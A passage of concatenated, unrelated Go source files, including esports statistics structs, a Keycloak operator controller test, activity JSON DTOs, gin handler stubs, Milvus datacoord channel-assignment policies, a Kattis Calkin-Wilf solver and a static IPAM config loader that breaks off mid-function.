					Denied *float64 `json:"denied"`
				} `json:"barracks"`
			} `json:"structures"`
			Creeps struct {
				Lane struct {
					Kills  *float64 `json:"kills"`
					Denies *float64 `json:"denies"`
				} `json:"lane"`
				Neutral struct {
					Roshan *float64 `json:"roshan"`
					Total  *float64 `json:"total"`
				} `json:"neutral"`
			} `json:"creeps"`
			FirstBlood struct {
				Rate    *float64 `json:"rate"`
				TakenAt *float64 `json:"taken_at"`
			} `json:"first_blood"`
		} `json:"match"`
	} `json:"average"`
}
// LolTeamStats holds a team's play-by-play stats for League of Legends.
type LolTeamStats struct {
	NrMatches int64 `json:"nr_matches"`
	NrWins    int64 `json:"nr_wins"`
	// SideStats splits matches/wins per starting side.
	SideStats struct {
		Purple struct {
			NrMatches int64 `json:"nr_matches"`
			NrWins    int64 `json:"nr_wins"`
		} `json:"purple"`
		Blue struct {
			NrMatches int64 `json:"nr_matches"`
			NrWins    int64 `json:"nr_wins"`
		} `json:"blue"`
	} `json:"side_stats"`
	// Average holds per-match averages; pointers distinguish absent values.
	Average struct {
		Match struct {
			Kills   *float64 `json:"kills"`
			Deaths  *float64 `json:"deaths"`
			Assists *float64 `json:"assists"`
			Gpm     *float64 `json:"gpm"`
			Length  *float64 `json:"length"`
			Wards   struct {
				Killed *float64 `json:"killed"`
				Placed *float64 `json:"placed"`
			} `json:"wards"`
			Structures struct {
				Turrets struct {
					Taken *float64 `json:"taken"`
					Lost  *float64 `json:"lost"`
				} `json:"turrets"`
				Inhibitors struct {
					Taken *float64 `json:"taken"`
					Lost  *float64 `json:"lost"`
				} `json:"inhibitors"`
			} `json:"structures"`
			Creeps struct {
				Lane struct {
					Kills *float64 `json:"kills"`
				} `json:"lane"`
				Neutral struct {
					Baron   *float64 `json:"baron"`
					Dragon  *float64 `json:"dragon"`
					Heralds *float64 `json:"heralds"`
					Total   *float64 `json:"total"`
				} `json:"neutral"`
			} `json:"creeps"`
			FirstBlood struct {
				Rate    *float64 `json:"rate"`
				TakenAt *float64 `json:"taken_at"`
			} `json:"first_blood"`
		} `json:"match"`
	} `json:"average"`
	// Champions lists per-champion match and win counts.
	Champions []struct {
		NrMatches int64    `json:"nr_matches"`
		NrWins    int64    `json:"nr_wins"`
		Champion  Champion `json:"champion"`
	} `json:"champions"`
	// TopStats holds the best single-player performances per category.
	// NOTE(review): the "Penta_kills"/"Unreal_kills" tags are capitalized,
	// unlike the snake_case used everywhere else — confirm against the API.
	TopStats struct {
		Kills               LolPlayerAgainst  `json:"kills"`
		Gpm                 LolPlayerAgainst  `json:"gpm"`
		Xpm                 LolPlayerAgainst  `json:"xpm"`
		DoubleKills         *LolPlayerAgainst `json:"double_kills"`
		TripleKills         *LolPlayerAgainst `json:"triple_kills"`
		QuadraKills         *LolPlayerAgainst `json:"quadra_kills"`
		PentaKills          *LolPlayerAgainst `json:"Penta_kills"`
		UnrealKills         *LolPlayerAgainst `json:"Unreal_kills"`
		LargestKillingSpree *LolPlayerAgainst `json:"largest_killing_spree"`
		LargestMultiKill    *LolPlayerAgainst `json:"largest_multi_kill"`
	} `json:"top_stats"`
	// TopMatches holds notable matches by kills per minute and length.
	TopMatches struct {
		Kpm struct {
			Avg     float64 `json:"avg"` // Only lol
			Highest struct {
				LolTeamAgainst
			} `json:"highest"`
			Lowest struct {
				LolTeamAgainst
			} `json:"lowest"`
		} `json:"kpm"`
		Length struct {
			Avg     float64 `json:"avg"`
			Longest struct {
				Won  LolTeamAgainst `json:"won"`
				Lost LolTeamAgainst `json:"lost"`
			} `json:"longest"`
			Shortest struct {
				Won  LolTeamAgainst `json:"won"`
				Lost LolTeamAgainst `json:"lost"`
			} `json:"shortest"`
		} `json:"length"`
	} `json:"top_matches"`
}
// TeamAgainst is a collection of common data when examining specific stats.
// It is grouped with the specific stat in another struct.
type TeamAgainst struct {
	MatchId int64 `json:"match_id"`
	Against *Team `json:"against"` // Declared as pointer to avoid invalid recursive type
}
// DotaPlayerAgainst is a grouping of PlayerAgainst and a Hero
type DotaPlayerAgainst struct {
	PlayerAgainst
	Hero Hero `json:"hero"`
}
// LolTeamAgainst associates a stat value and match with an opposing Roster.
type LolTeamAgainst struct {
	Value   float64 `json:"value"`
	MatchId int64   `json:"match_id"`
	Against Roster  `json:"against"`
}
// LolPlayerAgainst associates a player's stat value and champion with the
// match and opposing Roster it was achieved against.
type LolPlayerAgainst struct {
	Value    float64  `json:"value"`
	PlayerId int64    `json:"player_id"`
	MatchId  int64    `json:"match_id"`
	Champion Champion `json:"champion"`
	Against  Roster   `json:"against"`
}
// PlayerAgainst is a collection of common data when examining specific stats.
// It is grouped with the specific stat in another struct.
type PlayerAgainst struct {
	PlayerId int64 `json:"player_id"`
	Against  *Team `json:"against"` // Declared as pointer to avoid invalid recursive type
	MatchId  int64 `json:"match_id"`
}
// DotaHeroWithWins holds information about a Dota Hero, an integer
// representing an amount (e.g. times picked), and the wins with that hero.
// (The previous comment referred to the type as "DotaHeroWithAmount".)
type DotaHeroWithWins struct {
	Amount int64 `json:"amount"`
	Wins   int64 `json:"wins"`
	Hero   Hero  `json:"hero"`
}
|
package keycloak
import (
"context"
"math/rand"
"reflect"
"strconv"
"testing"
keycloakv1alpha1 "github.com/agilesolutions/operator/apis/keycloak/v1alpha1"
appsv1 "k8s.io/api/apps/v1"
corev1 "k8s.io/api/core/v1"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/types"
"k8s.io/client-go/kubernetes/scheme"
"sigs.k8s.io/controller-runtime/pkg/client/fake"
"sigs.k8s.io/controller-runtime/pkg/reconcile"
logf "sigs.k8s.io/controller-runtime/pkg/runtime/log"
)
// TestKeycloakController runs ReconcileKeycloak.Reconcile() against a
// fake client that tracks a Keycloak object. It drives three reconcile
// passes: the first must create the Deployment (and requeue), the second
// must create the Service (no requeue), and the third must record the pod
// names in the Keycloak status.
func TestKeycloakController(t *testing.T) {
	// Set the logger to development mode for verbose logs.
	logf.SetLogger(logf.ZapLogger(true))
	var (
		name            = "keycloak-operator"
		namespace       = "keycloak"
		replicas  int32 = 3
	)
	// A Keycloak resource with metadata and spec.
	keycloak := &keycloakv1alpha1.Keycloak{
		ObjectMeta: metav1.ObjectMeta{
			Name:      name,
			Namespace: namespace,
		},
		Spec: keycloakv1alpha1.KeycloakSpec{
			Size: replicas, // Set desired number of Keycloak replicas.
		},
	}
	// Objects to track in the fake client.
	objs := []runtime.Object{
		keycloak,
	}
	// Register operator types with the runtime scheme.
	s := scheme.Scheme
	s.AddKnownTypes(keycloakv1alpha1.SchemeGroupVersion, keycloak)
	// Create a fake client to mock API calls.
	cl := fake.NewFakeClient(objs...)
	// Create a ReconcileKeycloak object with the scheme and fake client.
	r := &ReconcileKeycloak{client: cl, scheme: s}
	// Mock request to simulate Reconcile() being called on an event for a
	// watched resource .
	req := reconcile.Request{
		NamespacedName: types.NamespacedName{
			Name:      name,
			Namespace: namespace,
		},
	}
	// First pass: the Deployment is expected to be created.
	res, err := r.Reconcile(req)
	if err != nil {
		t.Fatalf("reconcile: (%v)", err)
	}
	// Check the result of reconciliation to make sure it has the desired state.
	if !res.Requeue {
		t.Error("reconcile did not requeue request as expected")
	}
	// Check if Deployment has been created and has the correct size.
	dep := &appsv1.Deployment{}
	err = cl.Get(context.TODO(), req.NamespacedName, dep)
	if err != nil {
		t.Fatalf("get deployment: (%v)", err)
	}
	dsize := *dep.Spec.Replicas
	if dsize != replicas {
		t.Errorf("dep size (%d) is not the expected size (%d)", dsize, replicas)
	}
	// Second pass: no requeue expected.
	res, err = r.Reconcile(req)
	if err != nil {
		t.Fatalf("reconcile: (%v)", err)
	}
	// Check the result of reconciliation to make sure it has the desired state.
	if res.Requeue {
		t.Error("reconcile requeue which is not expected")
	}
	// Check if Service has been created.
	ser := &corev1.Service{}
	err = cl.Get(context.TODO(), req.NamespacedName, ser)
	if err != nil {
		t.Fatalf("get service: (%v)", err)
	}
	// Create the 3 expected pods in namespace and collect their names to check
	// later.
	podLabels := labelsForKeycloak(name)
	pod := corev1.Pod{
		ObjectMeta: metav1.ObjectMeta{
			Namespace: namespace,
			Labels:    podLabels,
		},
	}
	podNames := make([]string, 3)
	for i := 0; i < 3; i++ {
		pod.ObjectMeta.Name = name + ".pod." + strconv.Itoa(rand.Int())
		podNames[i] = pod.ObjectMeta.Name
		if err = cl.Create(context.TODO(), pod.DeepCopy()); err != nil {
			t.Fatalf("create pod %d: (%v)", i, err)
		}
	}
	// Reconcile again so Reconcile() checks pods and updates the Keycloak
	// resources' Status.
	res, err = r.Reconcile(req)
	if err != nil {
		t.Fatalf("reconcile: (%v)", err)
	}
	if res != (reconcile.Result{}) {
		t.Error("reconcile did not return an empty Result")
	}
	// Get the updated Keycloak object.
	keycloak = &keycloakv1alpha1.Keycloak{}
	err = r.client.Get(context.TODO(), req.NamespacedName, keycloak)
	if err != nil {
		t.Errorf("get keycloak: (%v)", err)
	}
	// Ensure Reconcile() updated the Keycloak's Status as expected.
	// NOTE(review): DeepEqual assumes Status.Nodes preserves creation order —
	// confirm the controller sorts or lists deterministically.
	nodes := keycloak.Status.Nodes
	if !reflect.DeepEqual(podNames, nodes) {
		t.Errorf("pod names %v did not match expected %v", nodes, podNames)
	}
}
|
package server
import (
"time"
"github.com/elhamza90/lifelog/internal/domain"
)
// JSONReqActivity is used to unmarshal a json activity request payload.
// Tags arrive as bare IDs (TagIds); ToDomain turns them into stub domain.Tag
// values without fetching them.
type JSONReqActivity struct {
	ID       domain.ActivityID `json:"id"`
	Label    string            `json:"label"`
	Desc     string            `json:"desc"`
	Place    string            `json:"place"`
	Time     time.Time         `json:"time"`
	Duration time.Duration     `json:"duration"`
	TagIds   []domain.TagID    `json:"tagIds"`
}
// ToDomain converts the request payload into a domain.Activity. Each tag ID
// is wrapped into a stub domain.Tag (nothing is fetched from storage).
func (reqAct JSONReqActivity) ToDomain() domain.Activity {
	tags := make([]domain.Tag, 0, len(reqAct.TagIds))
	for _, tagID := range reqAct.TagIds {
		tags = append(tags, domain.Tag{ID: tagID})
	}
	return domain.Activity{
		ID:       reqAct.ID,
		Label:    reqAct.Label,
		Desc:     reqAct.Desc,
		Place:    reqAct.Place,
		Time:     reqAct.Time,
		Duration: reqAct.Duration,
		Tags:     tags,
	}
}
// JSONRespDetailActivity is used to marshal an activity to json for the
// detail endpoint: it carries the full expense list and resolved tags.
type JSONRespDetailActivity struct {
	ID       domain.ActivityID     `json:"id"`
	Label    string                `json:"label"`
	Desc     string                `json:"desc"`
	Place    string                `json:"place"`
	Time     time.Time             `json:"time"`
	Duration time.Duration         `json:"duration"`
	Expenses []JSONRespListExpense `json:"expenses"`
	Tags     []domain.Tag          `json:"tags"`
}
// From populates respAct from a domain.Activity and the activity's expenses.
func (respAct *JSONRespDetailActivity) From(act domain.Activity, expenses []domain.Expense) {
	respAct.ID = act.ID
	respAct.Label = act.Label
	respAct.Place = act.Place
	respAct.Desc = act.Desc
	respAct.Time = act.Time
	respAct.Duration = act.Duration
	respExpenses := make([]JSONRespListExpense, len(expenses))
	// A single scratch value is reused across iterations; assumes
	// JSONRespListExpense.From overwrites every field — TODO confirm.
	var scratch JSONRespListExpense
	for i, exp := range expenses {
		scratch.From(exp)
		respExpenses[i] = scratch
	}
	respAct.Expenses = respExpenses
	respAct.Tags = act.Tags
}
// JSONRespListActivity is used to marshal a list of activities to json.
// It is the summary shape: no expenses, no tags.
type JSONRespListActivity struct {
	ID       domain.ActivityID `json:"id"`
	Label    string            `json:"label"`
	Desc     string            `json:"desc"`
	Place    string            `json:"place"`
	Time     time.Time         `json:"time"`
	Duration time.Duration     `json:"duration"`
}
// From copies the summary fields of a domain.Activity into respAct.
func (respAct *JSONRespListActivity) From(act domain.Activity) {
	respAct.ID = act.ID
	respAct.Label = act.Label
	respAct.Place = act.Place
	respAct.Desc = act.Desc
	respAct.Time = act.Time
	respAct.Duration = act.Duration
}
|
package v1
import (
"github.com/gin-gonic/gin"
_ "github.com/hukaixuan/mall-backend/pkg/e"
)
// @Summary Get user detail
// @Produce json
// @Param id path int true "ID"
// @Success 200 {string} string 200
// @Failure 500
// @Router /api/v1/users/{id} [get]
// GetUser returns the detail of a single user. Handler body not implemented yet.
func GetUser(c *gin.Context) {
}

// Registe signs up a new user. Handler body not implemented yet.
// NOTE(review): the name looks like a typo for "Register"; renaming the
// exported handler would break existing route registrations, so it is kept.
func Registe(c *gin.Context) {
}

// Login authenticates a user. Handler body not implemented yet.
func Login(c *gin.Context) {
}

// EditUser updates an existing user. Handler body not implemented yet.
func EditUser(c *gin.Context) {
}

// DeleteUser removes a user. Handler body not implemented yet.
func DeleteUser(c *gin.Context) {
}
|
// Copyright (C) 2019-2020 Zilliz. All rights reserved.
//
// Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance
// with the License. You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software distributed under the License
// is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
// or implied. See the License for the specific language governing permissions and limitations under the License.
package datacoord
import (
"crypto/rand"
"math"
"math/big"
"github.com/milvus-io/milvus/internal/log"
"github.com/milvus-io/milvus/internal/proto/datapb"
"go.uber.org/zap"
)
// clusterDeltaChange records how the set of known datanodes changed between
// the previously stored cluster view and the current one.
type clusterDeltaChange struct {
	newNodes []string // addresses of nodes that just joined
	offlines []string // addresses of nodes that went offline
	restarts []string // addresses of nodes that restarted
}

// clusterStartupPolicy defines the behavior when datacoord starts/restarts
type clusterStartupPolicy interface {
	// apply accept all nodes and new/offline/restarts nodes and returns datanodes whose status need to be changed
	apply(oldCluster map[string]*datapb.DataNodeInfo, delta *clusterDeltaChange, buffer []*datapb.ChannelStatus) ([]*datapb.DataNodeInfo, []*datapb.ChannelStatus)
}

// watchRestartsStartupPolicy is a marker type for the watch-restarts startup
// strategy. NOTE(review): currently unused — newWatchRestartsStartupPolicy
// returns the startupFunc value directly instead of this struct.
type watchRestartsStartupPolicy struct {
}

// newWatchRestartsStartupPolicy returns the default startup policy
// (see watchRestartStartup for the actual algorithm).
func newWatchRestartsStartupPolicy() clusterStartupPolicy {
	return watchRestartStartup
}

// startupFunc is a function adapter implementing clusterStartupPolicy.
type startupFunc func(cluster map[string]*datapb.DataNodeInfo, delta *clusterDeltaChange,
	buffer []*datapb.ChannelStatus) ([]*datapb.DataNodeInfo, []*datapb.ChannelStatus)

// apply implements clusterStartupPolicy by delegating to the function itself.
func (f startupFunc) apply(cluster map[string]*datapb.DataNodeInfo, delta *clusterDeltaChange,
	buffer []*datapb.ChannelStatus) ([]*datapb.DataNodeInfo, []*datapb.ChannelStatus) {
	return f(cluster, delta, buffer)
}
// watchRestartStartup is the default startup policy:
//  1. channels of restarted nodes are flagged Uncomplete so they are re-watched;
//  2. channels of offline nodes are collected into buffer;
//  3. buffered channels are dealt round-robin to new nodes, falling back to
//     any known node when there are no new nodes.
// It returns the nodes whose state changed plus whatever is left in buffer.
var watchRestartStartup startupFunc = func(cluster map[string]*datapb.DataNodeInfo, delta *clusterDeltaChange,
	buffer []*datapb.ChannelStatus) ([]*datapb.DataNodeInfo, []*datapb.ChannelStatus) {
	ret := make([]*datapb.DataNodeInfo, 0)
	for _, addr := range delta.restarts {
		node := cluster[addr]
		for _, ch := range node.Channels {
			ch.State = datapb.ChannelWatchState_Uncomplete
		}
		ret = append(ret, node)
	}
	// put all channels from offline into buffer first
	for _, addr := range delta.offlines {
		node := cluster[addr]
		for _, ch := range node.Channels {
			ch.State = datapb.ChannelWatchState_Uncomplete
			buffer = append(buffer, ch)
		}
	}
	// try new nodes first
	if len(delta.newNodes) > 0 && len(buffer) > 0 {
		idx := 0
		for len(buffer) > 0 {
			node := cluster[delta.newNodes[idx%len(delta.newNodes)]]
			node.Channels = append(node.Channels, buffer[0])
			buffer = buffer[1:]
			// append each node to ret only on its first assignment round to
			// avoid duplicates within this loop
			if idx < len(delta.newNodes) {
				ret = append(ret, node)
			}
			idx++
		}
	}
	// try online nodes if buffer is not empty
	if len(buffer) > 0 {
		online := make([]*datapb.DataNodeInfo, 0, len(cluster))
		for _, node := range cluster {
			online = append(online, node)
		}
		if len(online) > 0 {
			idx := 0
			for len(buffer) > 0 {
				node := online[idx%len(online)]
				node.Channels = append(node.Channels, buffer[0])
				buffer = buffer[1:]
				// same first-round-only bookkeeping as above; NOTE(review): a
				// node already added in an earlier phase may appear in ret twice
				if idx < len(online) {
					ret = append(ret, node)
				}
				idx++
			}
		}
	}
	return ret, buffer
}
// dataNodeRegisterPolicy defines the behavior when a datanode is registered
type dataNodeRegisterPolicy interface {
	// apply accept all online nodes and new created node, returns nodes needed to be changed
	apply(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo, buffer []*datapb.ChannelStatus) ([]*datapb.DataNodeInfo, []*datapb.ChannelStatus)
}

// dataNodeRegisterFunc is a function adapter implementing dataNodeRegisterPolicy.
type dataNodeRegisterFunc func(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo, buffer []*datapb.ChannelStatus) ([]*datapb.DataNodeInfo, []*datapb.ChannelStatus)

// apply implements dataNodeRegisterPolicy by delegating to the function itself.
func (f dataNodeRegisterFunc) apply(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo,
	buffer []*datapb.ChannelStatus) ([]*datapb.DataNodeInfo, []*datapb.ChannelStatus) {
	return f(cluster, session, buffer)
}

// emptyRegister is a test policy: it acknowledges the new node and leaves the
// buffered channels untouched.
var emptyRegister dataNodeRegisterFunc = func(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo,
	buffer []*datapb.ChannelStatus) ([]*datapb.DataNodeInfo, []*datapb.ChannelStatus) {
	return []*datapb.DataNodeInfo{session}, buffer
}

// registerAssignWithBuffer assigns every buffered channel to the newly
// registered node and returns an emptied buffer.
var registerAssignWithBuffer dataNodeRegisterFunc = func(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo,
	buffer []*datapb.ChannelStatus) ([]*datapb.DataNodeInfo, []*datapb.ChannelStatus) {
	session.Channels = append(session.Channels, buffer...)
	return []*datapb.DataNodeInfo{session}, []*datapb.ChannelStatus{}
}

// newEmptyRegisterPolicy returns the no-op register policy (test use).
func newEmptyRegisterPolicy() dataNodeRegisterPolicy {
	return emptyRegister
}

// newAssiggBufferRegisterPolicy returns the buffer-draining register policy.
// NOTE(review): "Assigg" looks like a typo for "Assign"; kept because other
// files in this package may call it by this name.
func newAssiggBufferRegisterPolicy() dataNodeRegisterPolicy {
	return registerAssignWithBuffer
}
// dataNodeUnregisterPolicy defines the behavior when datanode unregisters
type dataNodeUnregisterPolicy interface {
	// apply accept all online nodes and unregistered node, returns nodes needed to be changed
	apply(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo) []*datapb.DataNodeInfo
}

// unregisterNodeFunc is a function adapter implementing dataNodeUnregisterPolicy.
type unregisterNodeFunc func(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo) []*datapb.DataNodeInfo

// apply implements dataNodeUnregisterPolicy by delegating to the function itself.
func (f unregisterNodeFunc) apply(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo) []*datapb.DataNodeInfo {
	return f(cluster, session)
}

// emptyUnregisterFunc is a test policy: do nothing when a node unregisters.
var emptyUnregisterFunc unregisterNodeFunc = func(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo) []*datapb.DataNodeInfo {
	return nil
}

// randomAssignRegisterFunc randomly spreads the channels of an unregistered
// node over the remaining nodes. If no node is online this func is not
// invoked; the buffer is filled outside instead.
var randomAssignRegisterFunc unregisterNodeFunc = func(cluster map[string]*datapb.DataNodeInfo, session *datapb.DataNodeInfo) []*datapb.DataNodeInfo {
	if len(cluster) == 0 || // no available node
		session == nil ||
		len(session.Channels) == 0 { // lost node not watching any channels
		return []*datapb.DataNodeInfo{}
	}
	// bucket every channel of the lost node under a random index in [0, len(cluster))
	appliedNodes := make([]*datapb.DataNodeInfo, 0, len(session.Channels))
	raResult := make(map[int][]*datapb.ChannelStatus)
	for _, chanSt := range session.Channels {
		bIdx, err := rand.Int(rand.Reader, big.NewInt(int64(len(cluster))))
		if err != nil {
			log.Error("error generated rand idx", zap.Error(err))
			return []*datapb.DataNodeInfo{}
		}
		idx := bIdx.Int64()
		// defensive guard; rand.Int already returns a value below len(cluster)
		if int(idx) >= len(cluster) {
			continue
		}
		cs, ok := raResult[int(idx)]
		if !ok {
			cs = make([]*datapb.ChannelStatus, 0, 10)
		}
		chanSt.State = datapb.ChannelWatchState_Uncomplete
		cs = append(cs, chanSt)
		raResult[int(idx)] = cs
	}
	// hand each bucket to a node; map iteration order is itself random, which
	// is acceptable since the buckets were chosen uniformly anyway
	i := 0
	for _, node := range cluster {
		cs, ok := raResult[i]
		i++
		if ok {
			node.Channels = append(node.Channels, cs...)
			appliedNodes = append(appliedNodes, node)
		}
	}
	return appliedNodes
}

// newEmptyUnregisterPolicy returns the no-op unregister policy (test use).
func newEmptyUnregisterPolicy() dataNodeUnregisterPolicy {
	return emptyUnregisterFunc
}
// channelAssignPolicy defines the behavior when a new channel needs to be assigned
type channelAssignPolicy interface {
	// apply accept all online nodes and new created channel with collectionID, returns node needed to be changed
	apply(cluster map[string]*datapb.DataNodeInfo, channel string, collectionID UniqueID) []*datapb.DataNodeInfo
}

// channelAssignFunc is a function adapter implementing channelAssignPolicy.
type channelAssignFunc func(cluster map[string]*datapb.DataNodeInfo, channel string, collectionID UniqueID) []*datapb.DataNodeInfo

// apply implements channelAssignPolicy by delegating to the function itself.
func (f channelAssignFunc) apply(cluster map[string]*datapb.DataNodeInfo, channel string, collectionID UniqueID) []*datapb.DataNodeInfo {
	return f(cluster, channel, collectionID)
}

// Deprecated: test logic that assigns the channel to every data node not
// already watching it; works fine only when there is a single data node.
var assignAllFunc channelAssignFunc = func(cluster map[string]*datapb.DataNodeInfo, channel string, collectionID UniqueID) []*datapb.DataNodeInfo {
	ret := make([]*datapb.DataNodeInfo, 0)
	for _, node := range cluster {
		// skip nodes that already watch this channel
		has := false
		for _, ch := range node.Channels {
			if ch.Name == channel {
				has = true
				break
			}
		}
		if has {
			continue
		}
		node.Channels = append(node.Channels, &datapb.ChannelStatus{
			Name:         channel,
			State:        datapb.ChannelWatchState_Uncomplete,
			CollectionID: collectionID,
		})
		ret = append(ret, node)
	}
	return ret
}

// balancedAssignFunc assigns the channel to the node currently watching the
// fewest channels; it returns nil when the channel is already assigned, and
// an empty slice when the cluster is empty.
var balancedAssignFunc channelAssignFunc = func(cluster map[string]*datapb.DataNodeInfo, channel string, collectionID UniqueID) []*datapb.DataNodeInfo {
	if len(cluster) == 0 {
		return []*datapb.DataNodeInfo{}
	}
	// filter existed channel
	for _, node := range cluster {
		for _, c := range node.GetChannels() {
			if c.GetName() == channel && c.GetCollectionID() == collectionID {
				return nil
			}
		}
	}
	// pick the least-loaded node; ties are broken by map iteration order
	target, min := "", math.MaxInt32
	for k, v := range cluster {
		if len(v.GetChannels()) < min {
			target = k
			min = len(v.GetChannels())
		}
	}
	ret := make([]*datapb.DataNodeInfo, 0)
	cluster[target].Channels = append(cluster[target].Channels, &datapb.ChannelStatus{
		Name:         channel,
		State:        datapb.ChannelWatchState_Uncomplete,
		CollectionID: collectionID,
	})
	ret = append(ret, cluster[target])
	return ret
}

// newAssignAllPolicy returns the deprecated assign-to-all policy.
func newAssignAllPolicy() channelAssignPolicy {
	return assignAllFunc
}

// newBalancedAssignPolicy returns the least-loaded-node assign policy.
func newBalancedAssignPolicy() channelAssignPolicy {
	return balancedAssignFunc
}
|
package main
import (
"bufio"
"fmt"
"math"
"os"
"strconv"
)
// in tokenizes standard input; main switches it to word-splitting mode.
var in = bufio.NewScanner(os.Stdin)
/**
 * https://open.kattis.com/problems/rationalsequence3
 */
// main reads the number of test cases, then for each case reads the query
// number K and the Calkin-Wilf index n, printing "K p/q".
func main() {
	in.Split(bufio.ScanWords)
	N := NextInt()
	for i := 1; i <= N; i++ {
		// BUG FIX: echo the K read from the input instead of the loop
		// counter, so output stays correct even if cases are not 1..N.
		k := NextInt()
		p, q := Solve(NextInt())
		fmt.Printf("%d %d/%d\n", k, p, q)
	}
}
// Solve returns the fraction p/q at 1-based index n (n >= 1) of the
// breadth-first enumeration of the Calkin-Wilf tree. The bits of n below its
// most significant bit encode the path from the root 1/1: a 0 bit steps to
// the left child p/(p+q), a 1 bit to the right child (p+q)/q.
func Solve(n int) (uint, uint) {
	// Highest power of two <= n. math.Log2 works in floating point, so the
	// result is corrected here to guard against off-by-one rounding.
	levelVal := 1 << uint(int(math.Log2(float64(n))))
	for levelVal*2 <= n {
		levelVal *= 2
	}
	for levelVal > n {
		levelVal /= 2
	}
	p, q := uint(1), uint(1)
	// walk the path bits from just below the MSB down to bit 0
	for levelVal /= 2; levelVal > 0; levelVal /= 2 {
		if levelVal&n == 0 { // left child
			q += p
		} else { // right child
			p += q
		}
	}
	return p, q
}
// NextInt scans the next whitespace-separated token and parses it as an int.
// Malformed tokens silently yield 0 (contest input is trusted).
func NextInt() int {
	in.Scan()
	value, _ := strconv.Atoi(in.Text())
	return value
}
|
package ipam
import (
"encoding/json"
"fmt"
"net"
"os"
"strings"
"github.com/nik-johnson-net/rackdirector/pkg/dhcpd"
)
// HostAddressInfo bundles the full network identity handed out for a host.
type HostAddressInfo struct {
	Hostname     string
	Address      net.IP
	Network      net.IPNet
	Gateway      net.IP
	DNS          []net.IP
	DomainSearch string
}

// jsonIpamInterface mirrors one "interfaces" entry of the JSON config file.
type jsonIpamInterface struct {
	Device      string
	Port        string
	Ipv4        string // CIDR notation, parsed with net.ParseCIDR
	Ipv4Gateway string `json:"ipv4_gateway"`
}

// jsonIpamBmc mirrors the "bmc" entry of the JSON config file.
type jsonIpamBmc struct {
	Hostname    string
	Port        string
	Ipv4        string // CIDR notation, parsed with net.ParseCIDR
	Ipv4Gateway string `json:"ipv4_gateway"`
}

// jsonIpamHost mirrors one host entry of the JSON config file.
type jsonIpamHost struct {
	Hostname   string
	Interfaces []jsonIpamInterface
	Bmc        jsonIpamBmc
}

// jsonIpamConfig is the top-level JSON config document.
type jsonIpamConfig struct {
	Hosts []jsonIpamHost
}

// BMC is the parsed out-of-band management controller of a host.
type BMC struct {
	Hostname    string
	Port        string
	Ipv4        net.IP
	Network     net.IPNet
	Ipv4Gateway net.IP
}

// Interface is a parsed regular network interface of a host.
type Interface struct {
	Device      string
	Port        string
	Ipv4        net.IP
	Network     net.IPNet
	Ipv4Gateway net.IP
}

// Host groups a hostname with its interfaces and BMC.
type Host struct {
	Hostname   string
	Interfaces []Interface
	Bmc        BMC
}

// ipamConfig is the parsed, strongly-typed form of jsonIpamConfig.
type ipamConfig struct {
	Hosts []Host
}
// GetHost looks up the host owning the given switch port on the network that
// contains relayIP. Regular interfaces are matched first, then the BMC.
func (i ipamConfig) GetHost(port string, relayIP net.IP) (Host, bool) {
	for _, h := range i.Hosts {
		for _, iface := range h.Interfaces {
			if iface.Port == port && iface.Network.Contains(relayIP) {
				return h, true
			}
		}
		if h.Bmc.Port == port && h.Bmc.Network.Contains(relayIP) {
			return h, true
		}
	}
	return Host{}, false
}
// GetHostByIP finds the host that owns ip, either on one of its regular
// interfaces or on its BMC.
func (i ipamConfig) GetHostByIP(ip net.IP) (Host, bool) {
	for _, h := range i.Hosts {
		for _, iface := range h.Interfaces {
			if iface.Ipv4.Equal(ip) {
				return h, true
			}
		}
		if h.Bmc.Ipv4.Equal(ip) {
			return h, true
		}
	}
	return Host{}, false
}
// GetHostByHostname finds the host whose own hostname or BMC hostname equals
// the given name.
func (i ipamConfig) GetHostByHostname(hostname string) (Host, bool) {
	for _, h := range i.Hosts {
		if hostname == h.Hostname || hostname == h.Bmc.Hostname {
			return h, true
		}
	}
	return Host{}, false
}
// StaticIpam answers DHCP/IPAM queries from a fixed, file-defined host
// database (see NewFromFile).
type StaticIpam struct {
	config ipamConfig
}
// NewFromFile loads the static IPAM database from the JSON config at file.
// Any I/O or parse problem panics: the config is required at startup and a
// bad one should fail fast.
func NewFromFile(file string) *StaticIpam {
	configFile, err := os.Open(file)
	if err != nil {
		panic(err)
	}
	defer configFile.Close()
	decoder := json.NewDecoder(configFile)
	var jsonConfig jsonIpamConfig
	err = decoder.Decode(&jsonConfig)
	if err != nil {
		panic(err)
	}
	config := ipamConfig{
		Hosts: make([]Host, 0),
	}
	for _, host := range jsonConfig.Hosts {
		hostObj := Host{
			Hostname:   host.Hostname,
			Interfaces: make([]Interface, 0),
		}
		// resolve each interface's CIDR string into address + network
		for _, interf := range host.Interfaces {
			ip, network, err := net.ParseCIDR(interf.Ipv4)
			if err != nil {
				panic(err)
			}
			hostObj.Interfaces = append(hostObj.Interfaces, Interface{
				Device:      interf.Device,
				Port:        interf.Port,
				Ipv4:        ip,
				Network:     *network,
				Ipv4Gateway: net.ParseIP(interf.Ipv4Gateway),
			})
		}
		ip, network, err := net.ParseCIDR(host.Bmc.Ipv4)
		if err != nil {
			panic(err)
		}
		hostObj.Bmc = BMC{
			Hostname:    host.Bmc.Hostname,
			Port:        host.Bmc.Port,
			Ipv4:        ip,
			Network:     *network,
			Ipv4Gateway: net.ParseIP(host.Bmc.Ipv4Gateway),
		}
		config.Hosts = append(config.Hosts, hostObj)
	}
	// NOTE(review): debug dump of the whole database to stdout — consider a
	// proper logger or removing this before production use.
	fmt.Fprintf(os.Stdout, "Build database %v\n", config)
	return &StaticIpam{
		config: config,
	}
}
func computeGateway(ip net.IPNet) net.IP {
network := ip.IP.Mask(ip.Mask)
